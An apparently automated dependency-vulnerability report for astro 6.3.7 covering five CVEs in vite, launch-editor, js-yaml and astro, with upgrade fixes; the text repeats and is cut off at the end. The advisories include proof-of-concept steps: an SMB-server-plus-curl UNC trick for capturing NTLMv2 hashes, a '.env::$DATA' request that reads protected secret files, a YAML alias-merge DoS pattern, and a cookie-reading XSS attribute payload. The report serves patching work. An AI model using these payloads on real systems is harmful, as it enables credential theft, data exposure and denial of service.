Vulnerable Library - astro-6.3.7.tgz
Astro is a modern site builder with web best practices, performance, and DX front-of-mind.
Library home page: https://registry.npmjs.org/astro/-/astro-6.3.7.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Vulnerabilities
| Vulnerability |
Severity |
 CVSS |
Dependency |
Type |
Fixed in (astro version) |
Remediation Possible** |
| CVE-2026-53632 |
 High |
8.3 |
detected in multiple dependencies |
Transitive |
N/A* |
❌ |
| CVE-2026-54299 |
High |
7.5 |
astro-6.3.7.tgz |
Direct |
astro - 6.4.6 |
❌ |
| CVE-2026-53571 |
High |
7.5 |
detected in multiple dependencies |
Transitive |
N/A* |
❌ |
| CVE-2026-53550 |
 Medium |
5.3 |
js-yaml-4.1.1.tgz |
Transitive |
N/A* |
❌ |
| CVE-2026-54298 |
Medium |
4.2 |
astro-6.3.7.tgz |
Direct |
astro - 6.4.6 |
❌ |
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-2026-53632
Vulnerable Libraries - vite-7.3.3.tgz, vite-8.0.14.tgz
vite-7.3.3.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-7.3.3.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Dependency Hierarchy:
- astro-6.3.7.tgz (Root Library)
- ❌ vite-7.3.3.tgz (Vulnerable Library)
vite-8.0.14.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-8.0.14.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json
Dependency Hierarchy:
- astro-6.3.7.tgz (Root Library)
- vitefu-1.1.3.tgz
- ❌ vite-8.0.14.tgz (Vulnerable Library)
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary The "launch-editor" NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking. Impact If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the "launch-editor": - using Windows - NTLM is not disabled ("it is recommended to disable" (https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526), while it's still enabled by default) - the user accesses the attackers website that sends request to a middleware using "launch-editor" - the server that has the middleware using "launch-editor" is running - the attacker knows the URL for that server and the middleware This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems. Details "launch-editor" accepts file paths without validating or restricting Windows UNC paths such as: \attacker-host\share On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur. If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password. The attacker could target a developer that uses a development server using "launch-editor" to develop code locally, send them a link and grab their NTLMv2 hash. PoC From the attacker side, we will setup an SMB server. I personally used "Impacket's smbserver.py" (https://github.com/fortra/impacket/blob/master/examples/smbserver.py), but you could use something like "Responder" (https://github.com/lgandx/Responder) for this as well. For keeping it simple, we will use "smbserver.py" here. First, let's create a directory to serve as an SMB share. mkdir /tmp/data echo "Hello world" > /tmp/data/test.txt Then, start the SMB server. $ sudo smbserver.py -smb2support -debug share /tmp/data Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally ("vite"). Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use "curl" to achieve the same. curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt' Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of "smbserver.py" and see the NTLMv2 hash coming in. 
Publish Date: 2026-06-15
URL: CVE-2026-53632
CVSS 3 Score Details (8.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-v6wh-96g9-6wx3
Release Date: 2026-06-15
Fix Resolution: vite-plus - 0.1.24,vite - 6.4.3,launch-editor - 2.14.1,vite - 8.0.16,vite - 7.3.5
CVE-2026-54299
Vulnerable Library - astro-6.3.7.tgz
Astro is a modern site builder with web best practices, performance, and DX front-of-mind.
Library home page: https://registry.npmjs.org/astro/-/astro-6.3.7.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Dependency Hierarchy:
- ❌ astro-6.3.7.tgz (Vulnerable Library)
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary Astro SSR apps with prerendered error pages ("/404" or "/500" using "export const prerender = true") fetch those pages over HTTP at runtime when an error occurs. The URL for this fetch is derived from "request.url", which in turn gets its origin from the incoming "Host" header. When the "Host" header is not validated against "allowedDomains", an attacker can point the fetch at an arbitrary host and read the response. Who is affected This affects SSR deployments that: 1. Have a prerendered 404 or 500 page 2. Use "createRequestFromNodeRequest" from "astro/app/node" with "app.render()" without overriding "prerenderedErrorPageFetch" — this includes custom servers built on the public API and third-party adapters Not affected: - "@astrojs/node" >= 9.5.4 (reads error pages from disk) - "@astrojs/cloudflare" (uses the ASSETS binding) - The dev server (renders error pages in-process) How it works "createRequestFromNodeRequest" builds "request.url" from the raw "Host" / ":authority" header. The "allowedDomains" option is accepted but only gates "X-Forwarded-For" — it does not constrain the URL origin. (The public "createRequest" does fall back to "localhost" for unvalidated hosts; this internal builder did not.) When "app.render()" encounters a 404 or 500 with a prerendered error route, "default-handler.ts" constructs the error page URL using the origin from "request.url" and fetches it via "prerenderedErrorPageFetch", which defaults to global "fetch". The response body is served to the client. An attacker sends a request with "Host: attacker-host:port", triggers an error (e.g., requesting a nonexistent path for a 404), and receives the response from the attacker-controlled host reflected back. Remediation The error page fetch origin is now validated against "allowedDomains" before use. When the host is validated, the original origin is preserved. Otherwise, it falls back to "localhost". The fetch is also wrapped in a try/catch so that connection failures degrade gracefully to a plain error response. Credit 5ud0 / Tarmo Technologies
Publish Date: 2026-06-16
URL: CVE-2026-54299
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-2pvr-wf23-7pc7
Release Date: 2026-06-16
Fix Resolution: astro - 6.4.6
CVE-2026-53571
Vulnerable Libraries - vite-7.3.3.tgz, vite-8.0.14.tgz
vite-7.3.3.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-7.3.3.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Dependency Hierarchy:
- astro-6.3.7.tgz (Root Library)
- ❌ vite-7.3.3.tgz (Vulnerable Library)
vite-8.0.14.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-8.0.14.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json
Dependency Hierarchy:
- astro-6.3.7.tgz (Root Library)
- vitefu-1.1.3.tgz
- ❌ vite-8.0.14.tgz (Vulnerable Library)
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary The contents of files that are specified by ""server.fs.deny"" (https://vite.dev/config/server-options#server-fs-deny) can be returned to the browser on Windows. Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using "--host" or ""server.host" config option" (https://vitejs.dev/config/server-options.html#server-host)) - the sensitive file exists in the allowed directories specified by ""server.fs.allow"" (https://vite.dev/config/server-options#server-fs-allow) - either of: - the sensitive file exists in an NTFS volume - the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes) Details Vite’s dev server denies direct access to sensitive files through "server.fs.deny", including entries such as ".env", ".env.", and ".{crt,pem}". However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied. Because of this, requests such as "/.env::$DATA?raw" are treated as allowed paths, while Windows resolves them to the original file's default data stream. Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them. PoC $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev Access via browser at "http://localhost:5173/.env::$DATA?raw" 
Example expected result: - "/.env::$DATA?raw" returns the contents of ".env" - "/tls.pem::$DATA?raw" returns the contents of "tls.pem"
Publish Date: 2026-06-15
URL: CVE-2026-53571
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-fx2h-pf6j-xcff
Release Date: 2026-06-15
Fix Resolution: vite - 6.4.3,vite - 7.3.5,vite - 8.0.16,vite-plus - 0.1.24
CVE-2026-53550
Vulnerable Library - js-yaml-4.1.1.tgz
YAML 1.2 parser and serializer
Library home page: https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.1.tgz
Path to dependency file: /docs/starlight-docs/package.json
Path to vulnerable library: /docs/starlight-docs/package.json,/docs/package.json
Dependency Hierarchy:
- astro-6.3.7.tgz (Root Library)
- ❌ js-yaml-4.1.1.tgz (Vulnerable Library)
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary A crafted YAML document can trigger algorithmic CPU exhaustion in "js-yaml" merge-key processing ("<<") by repeating the same alias many times in a merge sequence. This causes quadratic parse-time behavior relative to input size and can block a Node.js worker/event loop for seconds with a relatively small payload (tens of KB), resulting in denial of service. Details The issue is in merge handling inside "lib/loader.js": - "storeMappingPair(...)" iterates every element of a merge sequence when key tag is "tag:yaml.org,2002:merge". - For each element, it calls "mergeMappings(...)". - "mergeMappings(...)" computes "Object.keys(source)" and performs "_hasOwnProperty.call(destination, key)" checks for each key. When input is of the form: a: &a {k0:0, k1:0, ..., kK:0} b: {<<: [*a, *a, *a, ... repeated M times ...]} all *a entries refer to the same anchored object. After the first merge, subsequent merges are semantically no-ops, but the parser still reprocesses all keys each time. Resulting work is O(K * M), while input size is O(K + M), giving quadratic scaling as payload grows. Relevant code path: lib/loader.js in storeMappingPair(...) merge branch (keyTag === 'tag:yaml.org,2002:merge') lib/loader.js mergeMappings(...) Root cause File: lib/loader.js Function: storeMappingPair(state, _result, overridableKeys, keyTag, keyNode, valueNode, startLine, startLineStart, startPos) Lines: ~359-366 if (keyTag === 'tag:yaml.org,2002:merge') { if (Array.isArray(valueNode)) { for (index = 0, quantity = valueNode.length; index < quantity; index += 1) { mergeMappings(state, _result, valueNode[index], overridableKeys); } } else { mergeMappings(state, _result, valueNode, overridableKeys); } } When the merge value is a sequence (YAML 1.1 <<: [ *a, *a, ... ]), each element is handed to mergeMappings() without deduplication. mergeMappings() then does sourceKeys = Object.keys(source); for (index = 0; index < sourceKeys.length; index += 1) { key = sourceKeys[index]; if (!_hasOwnProperty.call(destination, key)) { setProperty(destination, key, source[key]); overridableKeys[key] = true; } } Every alias reference in the sequence resolves (by design) to the SAME object via state.anchorMap. After the first merge, every subsequent merge of that same reference is a pure no-op semantically, but still performs: * one Object.keys(source) call (O(K)) * K _hasOwnProperty.call checks on the destination Total: M * K hasOwnProperty checks + M Object.keys allocations, while the final object and all observable side effects are identical to a single merge. YAML semantics for "<<:" are idempotent and commutative over duplicate sources, so collapsing duplicates preserves behavior exactly; this isn't a spec trade-off. PoC Environment: js-yaml version: 4.1.1 Node.js: v24.5.0 Platform: arm64 macOS (reproduced consistently) Reproduction script: Create many keys in one anchored map (&a). Merge that same alias repeatedly via <<: [*a, *a, ...]. Measure parse time and compare with control payload using single merge (<<: *a). Observed repeated runs (same machine): K=M=1000, input 9,909 bytes: ~33–36 ms K=M=2000, input 20,909 bytes: ~121–123 ms K=M=4000, input 42,909 bytes: ~524–537 ms K=M=6000, input 64,909 bytes: ~1,608–1,829 ms K=M=8000, input 86,909 bytes: ~3,395–3,565 ms Control (single merge, similar key counts): K=2000: ~1–2 ms K=4000: ~3 ms K=8000: ~5 ms Also verified: repeated-merge output equals single-merge output (same key count and same JSON), confirming excess time is redundant computation. Impact This is a denial-of-service vulnerability (CPU exhaustion / algorithmic complexity). Any service parsing untrusted YAML with js-yaml can be impacted, including API backends, CI tools, config processors, and automation services. An attacker can submit crafted YAML to significantly increase CPU time and reduce availability. Suggested fix: Dedupe the merge source list by reference before invoking mergeMappings. Any of the following are minimal and preserve YAML 1.1 merge semantics: dedupe in storeMappingPair: if (keyTag === 'tag:yaml.org,2002:merge') { if (Array.isArray(valueNode)) { var seen = new Set(); for (index = 0, quantity = valueNode.length; index < quantity; index += 1) { var src = valueNode[index]; if (seen.has(src)) continue; // idempotent; skip redundant alias seen.add(src); mergeMappings(state, _result, src, overridableKeys); } } else { mergeMappings(state, _result, valueNode, overridableKeys); } }
Publish Date: 2026-06-15
URL: CVE-2026-53550
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: Low
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-06-15
Fix Resolution: https://github.com/nodeca/js-yaml.git - 4.2.0
CVE-2026-54298
Vulnerable Library - astro-6.3.7.tgz
Astro is a modern site builder with web best practices, performance, and DX front-of-mind.
Library home page: https://registry.npmjs.org/astro/-/astro-6.3.7.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Dependency Hierarchy:
- ❌ astro-6.3.7.tgz (Vulnerable Library)
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary The "spreadAttributes" function in Astro's server-side rendering pipeline iterates over object keys and passes them directly to "addAttribute", which interpolates the key into the HTML output without escaping. When a developer uses the spread syntax "{...props}" on an HTML element and the object keys come from an untrusted source (API, CMS, URL parameters), an attacker can inject arbitrary HTML attributes including event handlers like "onmousemove", "onclick", or break out of the attribute context entirely to inject new elements. Details The vulnerable function is ""addAttribute"" (https://github.com/withastro/astro/blob/main/packages/astro/src/runtime/server/render/util.ts#L81-L141) at "packages/astro/src/runtime/server/render/util.ts:81-141": export function addAttribute(value: any, key: string, shouldEscape = true, tagName = '') { if (value == null) { return ''; } return markHTMLString(" ${key}="${toAttributeString(value, shouldEscape)}""); // key interpolated not escaped } This function is called from ""spreadAttributes"" (https://github.com/withastro/astro/blob/main/packages/astro/src/runtime/server/index.ts#L91-L92) at "packages/astro/src/runtime/server/index.ts:91-92": for (const [key, value] of Object.entries(values)) { output += addAttribute(value, key, true, _name); } The "toAttributeString" function escapes the attribute value, but the attribute name "key" is never validated or escaped. An attacker can craft a JSON object with a key containing " characters to break out of the attribute context and inject event handlers. Execution flow: User controlled object keys (from API, CMS, URL params) are spread onto element via "{...props}". The compiler generates "spreadAttributes(props)" which iterates with "Object.entries()" and calls "addAttribute(value, key)". The key is interpolated as "" ${key}="${escapedValue}""". A malicious key breaks attribute context, resulting in XSS. POC Create an SSR Astro page ("src/pages/index.astro"): const props = JSON.parse(Astro.url.searchParams.get('props') || '{}');
Hello
<div {...props}>Move mouse here Enable SSR in "astro.config.mjs" (for URL based demo): export default defineConfig({ output: 'server' }); Note: SSR is not required for the vulnerability to exist. In static builds (default), the attack vector is compromised data sources at build time (API, CMS, database). SSR simply makes the PoC easier to demonstrate via URL parameters. Start the dev server and visit: http://localhost:4321/?props={"x\" onmousemove="alert(document.cookie)" y":""} URL encoded: http://localhost:4321/?props=%7B%22x%5C%22%20onmousemove%3D%5C%22alert(document.cookie)%5C%22%20y%22%3A%22%22%7D View the HTML source. The output contains: <div x" onmousemove="alert(document.cookie)" y="">Move mouse here The key "x" onmousemove="alert(document.cookie)" y" breaks out of the attribute context. Moving the mouse over the div executes the JavaScript. 
Impact An attacker can execute arbitrary JavaScript in the context of a victim's browser session on any Astro application that spreads object props from untrusted sources onto HTML elements. This is a common pattern when integrating with external APIs or CMS systems. Exploitation enables session hijacking via cookie theft, credential theft by injecting fake login forms or keyloggers, defacement of the rendered page, and redirection to attacker controlled domains. The vulnerability affects all Astro versions that support spread syntax on HTML elements and is exploitable in SSR, SSG (if build time data is compromised), and hybrid deployments.
Publish Date: 2026-06-16
URL: CVE-2026-54298
CVSS 3 Score Details (4.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-jrpj-wcv7-9fh9
Release Date: 2026-06-16
Fix Resolution: astro - 6.4.6
Astro is a modern site builder with web best practices, performance, and DX front-of-mind.
Library home page: https://registry.npmjs.org/astro/-/astro-6.3.7.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Libraries - vite-7.3.3.tgz, vite-8.0.14.tgz
vite-7.3.3.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-7.3.3.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Dependency Hierarchy:
vite-8.0.14.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-8.0.14.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json
Dependency Hierarchy:
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary The "launch-editor" NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking. Impact If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the "launch-editor": - using Windows - NTLM is not disabled ("it is recommended to disable" (https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526), while it's still enabled by default) - the user accesses the attackers website that sends request to a middleware using "launch-editor" - the server that has the middleware using "launch-editor" is running - the attacker knows the URL for that server and the middleware This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems. Details "launch-editor" accepts file paths without validating or restricting Windows UNC paths such as: \attacker-host\share On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur. If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password. The attacker could target a developer that uses a development server using "launch-editor" to develop code locally, send them a link and grab their NTLMv2 hash. PoC From the attacker side, we will setup an SMB server. I personally used "Impacket's smbserver.py" (https://github.com/fortra/impacket/blob/master/examples/smbserver.py), but you could use something like "Responder" (https://github.com/lgandx/Responder) for this as well. For keeping it simple, we will use "smbserver.py" here. First, let's create a directory to serve as an SMB share. mkdir /tmp/data echo "Hello world" > /tmp/data/test.txt Then, start the SMB server. $ sudo smbserver.py -smb2support -debug share /tmp/data Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally ("vite"). Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use "curl" to achieve the same. curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt' Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of "smbserver.py" and see the NTLMv2 hash coming in.
Publish Date: 2026-06-15
URL: CVE-2026-53632
CVSS 3 Score Details (8.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-v6wh-96g9-6wx3
Release Date: 2026-06-15
Fix Resolution: vite-plus - 0.1.24,vite - 6.4.3,launch-editor - 2.14.1,vite - 8.0.16,vite - 7.3.5
Vulnerable Library - astro-6.3.7.tgz
Astro is a modern site builder with web best practices, performance, and DX front-of-mind.
Library home page: https://registry.npmjs.org/astro/-/astro-6.3.7.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Dependency Hierarchy:
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary Astro SSR apps with prerendered error pages ("/404" or "/500" using "export const prerender = true") fetch those pages over HTTP at runtime when an error occurs. The URL for this fetch is derived from "request.url", which in turn gets its origin from the incoming "Host" header. When the "Host" header is not validated against "allowedDomains", an attacker can point the fetch at an arbitrary host and read the response. Who is affected This affects SSR deployments that: 1. Have a prerendered 404 or 500 page 2. Use "createRequestFromNodeRequest" from "astro/app/node" with "app.render()" without overriding "prerenderedErrorPageFetch" — this includes custom servers built on the public API and third-party adapters Not affected: - "@astrojs/node" >= 9.5.4 (reads error pages from disk) - "@astrojs/cloudflare" (uses the ASSETS binding) - The dev server (renders error pages in-process) How it works "createRequestFromNodeRequest" builds "request.url" from the raw "Host" / ":authority" header. The "allowedDomains" option is accepted but only gates "X-Forwarded-For" — it does not constrain the URL origin. (The public "createRequest" does fall back to "localhost" for unvalidated hosts; this internal builder did not.) When "app.render()" encounters a 404 or 500 with a prerendered error route, "default-handler.ts" constructs the error page URL using the origin from "request.url" and fetches it via "prerenderedErrorPageFetch", which defaults to global "fetch". The response body is served to the client. An attacker sends a request with "Host: attacker-host:port", triggers an error (e.g., requesting a nonexistent path for a 404), and receives the response from the attacker-controlled host reflected back. Remediation The error page fetch origin is now validated against "allowedDomains" before use. When the host is validated, the original origin is preserved. Otherwise, it falls back to "localhost". The fetch is also wrapped in a try/catch so that connection failures degrade gracefully to a plain error response. Credit 5ud0 / Tarmo Technologies
Publish Date: 2026-06-16
URL: CVE-2026-54299
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-2pvr-wf23-7pc7
Release Date: 2026-06-16
Fix Resolution: astro - 6.4.6
Vulnerable Libraries - vite-7.3.3.tgz, vite-8.0.14.tgz
vite-7.3.3.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-7.3.3.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json,/docs/starlight-docs/package.json
Dependency Hierarchy:
vite-8.0.14.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-8.0.14.tgz
Path to dependency file: /docs/package.json
Path to vulnerable library: /docs/package.json
Dependency Hierarchy:
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary The contents of files that are specified by ""server.fs.deny"" (https://vite.dev/config/server-options#server-fs-deny) can be returned to the browser on Windows. Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using "--host" or ""server.host" config option" (https://vitejs.dev/config/server-options.html#server-host)) - the sensitive file exists in the allowed directories specified by ""server.fs.allow"" (https://vite.dev/config/server-options#server-fs-allow) - either of: - the sensitive file exists in an NTFS volume - the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes) Details Vite’s dev server denies direct access to sensitive files through "server.fs.deny", including entries such as ".env", ".env.", and ".{crt,pem}". However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied. Because of this, requests such as "/.env::$DATA?raw" are treated as allowed paths, while Windows resolves them to the original file's default data stream. Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them. PoC $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev Access via browser at "http://localhost:5173/.env::$DATA?raw"
Example expected result: - "/.env::$DATA?raw" returns the contents of ".env" - "/tls.pem::$DATA?raw" returns the contents of "tls.pem"
Publish Date: 2026-06-15
URL: CVE-2026-53571
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-fx2h-pf6j-xcff
Release Date: 2026-06-15
Fix Resolution: vite - 6.4.3,vite - 7.3.5,vite - 8.0.16,vite-plus - 0.1.24
Vulnerable Library - js-yaml-4.1.1.tgz
YAML 1.2 parser and serializer
Library home page: https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.1.tgz
Path to dependency file: /docs/starlight-docs/package.json
Path to vulnerable library: /docs/starlight-docs/package.json,/docs/package.json
Dependency Hierarchy:
Found in HEAD commit: ec994c1a9bf5ae33c1721ef3568d20d917573751
Found in base branch: main
Vulnerability Details
Summary A crafted YAML document can trigger algorithmic CPU exhaustion in "js-yaml" merge-key processing ("<<") by repeating the same alias many times in a merge sequence. This causes quadratic parse-time behavior relative to input size and can block a Node.js worker/event loop for seconds with a relatively small payload (tens of KB), resulting in denial of service. Details The issue is in merge handling inside "lib/loader.js": - "storeMappingPair(...)" iterates every element of a merge sequence when key tag is "tag:yaml.org,2002:merge". - For each element, it calls "mergeMappings(...)". - "mergeMappings(...)" computes "Object.keys(source)" and performs "_hasOwnProperty.call(destination, key)" checks for each key. When input is of the form: a: &a {k0:0, k1:0, ..., kK:0} b: {<<: [*a, *a, *a, ... repeated M times ...]} all *a entries refer to the same anchored object. After the first merge, subsequent merges are semantically no-ops, but the parser still reprocesses all keys each time. Resulting work is O(K * M), while input size is O(K + M), giving quadratic scaling as payload grows. Relevant code path: lib/loader.js in storeMappingPair(...) merge branch (keyTag === 'tag:yaml.org,2002:merge') lib/loader.js mergeMappings(...) Root cause File: lib/loader.js Function: storeMappingPair(state, _result, overridableKeys, keyTag, keyNode, valueNode, startLine, startLineStart, startPos) Lines: ~359-366 if (keyTag === 'tag:yaml.org,2002:merge') { if (Array.isArray(valueNode)) { for (index = 0, quantity = valueNode.length; index < quantity; index += 1) { mergeMappings(state, _result, valueNode[index], overridableKeys); } } else { mergeMappings(state, _result, valueNode, overridableKeys); } } When the merge value is a sequence (YAML 1.1 <<: [ *a, *a, ... ]), each element is handed to mergeMappings() without deduplication. mergeMappings() then does sourceKeys = Object.keys(source); for (index = 0; index < sourceKeys.length; index += 1) { key = sourceKeys[index]; if (!_hasOwnProperty.call(destination, key)) { setProperty(destination, key, source[key]); overridableKeys[key] = true; } } Every alias reference in the sequence resolves (by design) to the SAME object via state.anchorMap. After the first merge, every subsequent merge of that same reference is a pure no-op semantically, but still performs: * one Object.keys(source) call (O(K)) * K _hasOwnProperty.call checks on the destination Total: M * K hasOwnProperty checks + M Object.keys allocations, while the final object and all observable side effects are identical to a single merge. YAML semantics for "<<:" are idempotent and commutative over duplicate sources, so collapsing duplicates preserves behavior exactly; this isn't a spec trade-off. PoC Environment: js-yaml version: 4.1.1 Node.js: v24.5.0 Platform: arm64 macOS (reproduced consistently) Reproduction script: Create many keys in one anchored map (&a). Merge that same alias repeatedly via <<: [*a, *a, ...]. Measure parse time and compare with control payload using single merge (<<: *a). Observed repeated runs (same machine): K=M=1000, input 9,909 bytes: ~33–36 ms K=M=2000, input 20,909 bytes: ~121–123 ms K=M=4000, input 42,909 bytes: ~524–537 ms K=M=6000, input 64,909 bytes: ~1,608–1,829 ms K=M=8000, input 86,909 bytes: ~3,395–3,565 ms Control (single merge, similar key counts): K=2000: ~1–2 ms K=4000: ~3 ms K=8000: ~5 ms Also verified: repeated-merge output equals single-merge output (same key count and same JSON), confirming excess time is redundant computation. Impact This is a denial-of-service vulnerability (CPU exhaustion / algorithmic complexity). Any service parsing untrusted YAML with js-yaml can be impacted, including API backends, CI tools, config processors, and 